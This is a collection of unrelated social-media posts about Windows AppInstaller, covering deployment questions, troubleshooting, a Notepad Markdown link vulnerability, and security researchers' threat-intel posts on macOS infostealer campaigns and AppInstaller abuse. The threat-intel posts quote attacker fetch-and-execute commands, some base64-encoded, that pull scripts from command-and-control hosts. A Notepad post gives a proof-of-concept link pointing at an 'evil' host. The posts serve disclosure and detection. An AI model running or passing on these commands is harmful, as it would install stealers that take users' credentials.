Do you know what is the best way to get an MSIX app deployed to RDS users on Windows Server 2022, when the MSIX app is in the Microsoft Store and not using appinstaller as a separate way to deploy the app?

Nyxian a fully on-device iOS FOSS native code IDE that works on nonjailbroken latest iOS gets soon support for Swift 6.3 using the latest iOS SDK! Stay tuned🔥🔥 make sure to follow @KyleSwifter and @AppInstalleriOS, without them this wouldn’t be possible (yes appinstaller didn’t actively help on Nyxian 0.10 but the technique he used in FridaCodeManager helped Nyxian!)

.appinstallerパッケージを落としてくれば無料ですよ. よければMSストア版またはGithubでサポートしてね~みたいな感じです. $10なのでまぁフェアな価格ではあるとは思います.

A retry button when installing .appinstaller files would be nice

【注意喚起】メモ帳の「Markdown機能」が原因でRCE（危険な不具合みたいなもの）出てた話！業務で使ってる人は今すぐアップデート！ とりあえず、業務でメモ帳を使ってる人はアップデートをしてから読んでほしい。 リポスト元はメモ帳の最近アップデートで出来るようになったメモ帳の「Markdown機能」の不具合の情報。 ポイントをまとめるから、アップデートしてから何があったかを見て見てね！ 結論としては、AIじゃなくてMarkdownのリンク処理が甘くて危険なURI（ファイルの格納場所のようなもの）が実行される不具合。今すぐメモ帳を更新で対策は出来る。 ① 何が起きてたのか Markdownで書いたリンクをHTMLプレビュー→クリックすると、そのまま実行される仕様だった。 例）[テスト](file://C:/test.exe) みたいなリンク。 本来は「ただのテキスト」扱いにすべきURIも、ShellExecuteExW()って仕組みにそのまま渡してたのが問題。 再現条件は「Markdownファイルを開いて、HTMLプレビューでリンクをクリック」。普通にメモを見るだけなら発動しない。 ② どんなURIが危ない？ ・file:// → ローカルの実行ファイルが起動する可能性 ・ms-appinstaller:// → アプリのインストール誘導 つまり「リンクを踏ませる」前提の攻撃。メールや共有ファイル経由で来ると普通に引っかかる人はいる。 CVSSスコア（危険度）は7.8/10.0（High）。放置は非推奨。 ③ AIは関係ない 最近「AI搭載メモ帳」って言われがちだけど、今回の原因はAI機能じゃなくてMarkdownサポート部分。 なので「AI怖い」じゃなくて「リンクの扱いが甘かった」ということ。 ④ もう修正済み 対策版では危険なURIはエスケープ処理されて、クリックしても実行されない。 普通にWindowsを使っていて、Microsoft Storeの自動更新が有効なら、基本はもう大丈夫。でも一応確認はしてね。 ■メモ帳が最新かの確認方法 ・Microsoft Storeを開く ・「ライブラリ」→「更新プログラムの取得」を押す ・メモ帳が最新か確認 ついでに、怪しい.mdファイルをいきなりプレビューしないクセもつけとくと安心。 まとめると、「Markdownのリンクをそのまま実行してしまう設計ミス」があったが「今は修正済み」。 最近は生成AIが普及してきて.mdの拡張子ファイルも増えてるから気をつけよう。

I dont fully understand how this is a RCE. POC shows ms-appinstaller:// and file:// being used. App Installer is disabled by default and file:// doesn't allow arguments. If this is seen as a RCE, then don't we also have a RCE through hyperlinks in the Terminal app?

Windows 11のメモ帳に深刻な欠陥が見つかり、細工されたMarkdownリンクをクリックするだけで警告なしにプログラムが実行される問題が修正された。ユーザーの操作権限で不正コードが動作する恐れがあった。特殊なリンク経由で外部ファイルも起動可能だったという。 2月のパッチチューズデーで修正されたこの問題はCVE-2026-20841として追跡され、コマンドインジェクションにより不正なプロトコルを起動できる不備だった。攻撃者はMarkdown形式の.mdファイルにfile://やms-appinstaller://などのURIを埋め込み、Ctrlキーを押しながらリンクをクリックさせるだけで実行ファイルやリモート共有上のプログラムを警告なしに起動させられた。影響を受けるのはバージョン11.2510以前で、従来はhttpやhttps以外のリンクでも確認ダイアログが表示されなかった。現在はfile、ms-settings、mailto、ms-searchなどのスキームを開く際に警告が出るよう変更され、Microsoft Store経由で自動更新される。 bleepingcomputer.com/news/mi…

More like ms-appinstaller://?source=evilpayload.xyz to install an untrusted app

[poc](ms-appinstaller://?source=https://evil/xxx.appx).md no shit. This is the PoC

Updates are automatic for Windows. When it initially opens, the Windows Appinstaller searches for an update. You can also download the latest from our website which is 9.6.6. Mac has a search for update feature and auto update option.

#2/3 - MacOS malware MacOS users get on pmacos[.]onelink[.]me/m5yY/q5vbjgvh >> cotlesgengeral[.]com >> drmcdermottmd[.]com/salt-engine.html (image 1) This fake Github download page is serving a curl payload. The same template has been observed in the past serving other MacOS stealers. echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && curl -s $(echo 'aHR0cHM6Ly9pbXBlci1zdHJsazUuY29tL2xvYWRlci5zaD9idWlsZD1jNmEzZWExMjNkOTBkMzE1NzllYmJkMzAzMWE1MGFkMQ==' | base64 -d) | zsh Decoded to hxxps://imper-strlk5.com/loader.sh?build=c6a3ea123d90d31579ebbd3031a50ad1 (image 2) (saved 5e3aefd7668cb5eb4da18b1040847029dddb55096a922658633bc85fb5008b7a) These bash script (b64 gunzip) once decoded, is fetching and downloading malicious applescript via osascript (image 3) The applescript can be found here: 9191101893e419eac4be02d416e4eed405ba2055441f36e564f09c19cb26271c Functionality of stealer and persistence module was described on the quoted posts and comments. This applescript is a blatant copy of the MacSync functionality, using imper-strlk5[.]com/gate as C2. On the applescript we can see a reference to "SHub Stealer v2.0" Based on the characteristics and infrastructure of this campaign, we do believe this MacOS stealer is a private custom-adaptation (a good way to say this is a copy) of the MacSync Stealer applescript Similar adaptation of the Windows builds described in the below post

Interesting MacOS infostealer campaign via Github traffic (🎩 @osint_barbie ) Spread as a fake Shimo VPN Client (image 1 - github[.]com/Browndash1368/shimo-mac-unlocked-edition) redirecting users to a fake Github download page (image 2) browndash1368[.]github[.]io >> macos[.]aidevmac[.]com github[.]macos-developer[.]com/main The a bash script is shared: echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9nejF4c2hjYnU3N29nbWd0KSI=' | base64 -d | bash Chaining more bash script from C2 (image 3) /bin/bash -c "$(curl -fsSL http://91[.]92[.]242[.]30/gz1xshcbu77ogmgt)" Then downloading and executing a malicious Mach-O (image 4) Looking at strings inside the Mach-O, there is a reference to "macos-stealer-v2" IOCs a0e66f3067e4aaf5b83e45b7845cc43b2fc96032a4398cab7cc9d11f4f962e91 (this thread) ab267488d2c0a6300b61b5c9046cb86fe4a9ac3fe9a615acd374465b3a4b26c2 (older)

VRCFaceTracking 업데이트 이후로 페이셜 이상해진분들 아래사진처럼 체크풀고 사용해보세요 또는 스팀버전VRCFaceTracking을 지우고 github.com/benaclejames/VRCF… 가셔서 VRCFaceTracking_x64.appinstaller 다운로드 받으신뒤 시간을 수동으로 25년 3월 이전으로 바꾸신뒤 설치하셔서 다운그레이드 하세요

You'll have to pin it to your task bar to open it. If not using the Installer file to open it would be the current solution. The issue is that Windows Appinstaller is getting broken causing Meld to not open properly or connect to the integrations. The devs, including @__constexpr, are working on a way to move away from AppInstaller or a fix until Microsoft can roll out the update for it.

This means one of a few things - Windows is not fully up to date: Make sure there are NO updates for Windows or Appinstaller via the Microsoft Store - You have an Antivirus that is false positively blocking Meld: Whitelist Meld or delete the antivirus as the built in Microsoft Defender one is pretty dang good. - Windows/Appinstaller is corrupted: Repair Windows If none of those work, DM and ill get you set up ASAP

PSA to devs using Desktop Bridge/Project Reunion: Microsoft is killing the VCLibs dependency download links in the future (e.g., aka-ms/Microsoft.VCLibs.arm64.14.00.Desktop.appx). This impacts my .appinstaller distribution channel. Hmm. learn.microsoft.com/en-us/tr…

🚀 Flekstore iOS just got a MAJOR upgrade! 🎯 Install apps, games & tweaks with NO PC & NO REVOKE! 🔥 Don’t miss this game-changer! 📲 Watch now 👉 youtu.be/-voRANRBqqc #Flekstore #iOS #AppInstaller #TechjunkieAman #NoPC #NoRevoke #iOSApps

Living Off the Land - #AppInstaller Abuse on #Windows A lesser-known LOLBAS technique involving AppInstaller.exe, a legitimate tool designed to install .appx and .msix application packages on Windows 10 and 11. AppInstaller can be misused to silently download and execute payloads from remote sources using specially crafted .appinstaller manifests. --- ⚙️ #Exploitation Mechanism By leveraging the ms-appinstaller URI scheme, adversaries can invoke ms-appinstaller. This triggers a download of the associated .msix file into the user's INetCache and prompts installation, executing embedded binaries like calc.exe under user-level privileges. This misuse aligns with #MITRE ATT&CK T1105: Ingress Tool Transfer, providing a stealthy method for tool delivery that often bypasses traditional download detections. --- 🧪 Proof of Concept - #PoC A full working PoC has been scripted using: > makeappx.exe and signtool.exe from the Windows ADK. > A self-signed certificate for sideloading. > A Python-hosted web server serving both the .msix and .appinstaller. This chain leads to the execution of a trojanized package impersonating legitimate software. The exploit requires no elevated privileges and operates under a standard user context, significantly lowering the barrier for exploitation in real-world scenarios. - github.com/Logisek/CalcOrItD… --- 🔍 #Detection & #Mitigation You should focus on: > DNS queries from AppInstaller.exe. > Suspicious use of the ms-appinstaller protocol. > Files dropped in INetCache with .appinstaller and .msix extensions. > Completely blocking of ms-appinstaller protocol if not needed. - logisek.com #CyberSecurity #LOLBAS #OffensiveSecurity #RedTeam #PenetrationTesting #BlueTeam #InfoSec #Offsec #Logisek

Living off the land with AppInstaller.exe A fake signed .msix package .appinstaller file to trigger execution via ms-appinstaller (AppInstaller.py). RCE (or not, just a calc), no user prompt if trusted. github.com/Logisek/CalcOrItD… #RedTeam #Infosec #Offsec #Logisek

All Fixed up now :D Solution was to use the Add-AppxPackage request within Powershell since AppInstaller was being a meanie butt